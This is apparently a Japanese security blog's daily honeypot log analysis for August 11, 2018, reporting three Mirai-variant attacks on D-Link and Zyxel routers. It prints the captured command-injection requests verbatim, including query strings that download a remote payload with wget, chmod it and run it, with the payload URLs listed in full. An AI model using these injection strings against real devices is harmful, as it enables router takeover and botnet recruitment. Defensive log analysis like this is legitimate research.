S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/11)

ハニーポットのログ分析(2018/08/11)

honeypot

WOWhoneypotの2018/08/11(運用69日目)の簡易分析です。
本日の総アクセス件数は 27件です。以下が全アクセスログです。

19 2018-08-11 GET /
1 2018-08-11 PROPFIND /
1 2018-08-11 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-08-11 GET /webdav/
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6.127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-11 GET /help.php
1 2018-08-11 GET /db_cts.php
1 2018-08-11 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

 

phpMyAdmin関連(0件)とphpに対する調査行為(2件)と/へのアクセスを除外したアクセス数です。

1 2018-08-11 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-08-11 GET /webdav/
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
1 2018-08-11 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$

1 2018-08-11 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

Mirai亜種が3件来ています。
うち2つはD-Linkの脆弱性を攻撃するもの、1件はZyxelルータの脆弱性を攻撃するものです。
D-Linkを狙ったものの1つは新しいUser-Agent: LMAO/2.0です。
Shinoa(Hello,World)、LMAO/2.0、Gemini/2.0(UAなし)と3種類のものが来ていることになります。

 GET /login.cgi?cli=aa%20aa%27;wget%20http://217.61.6.127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World

GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: LMAO/2.0

GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 HTTP/1.0

 

本日のハンティングログは以下です。全てMirai亜種です。

1 2018-08-11 wget hxxp://217.61.6[.]127/t
1 2018-08-11 wget hxxp://212.237.32[.]62/k
1 2018-08-11 wget hxxp://178.128.11[.]199/rvs 

 

以上です。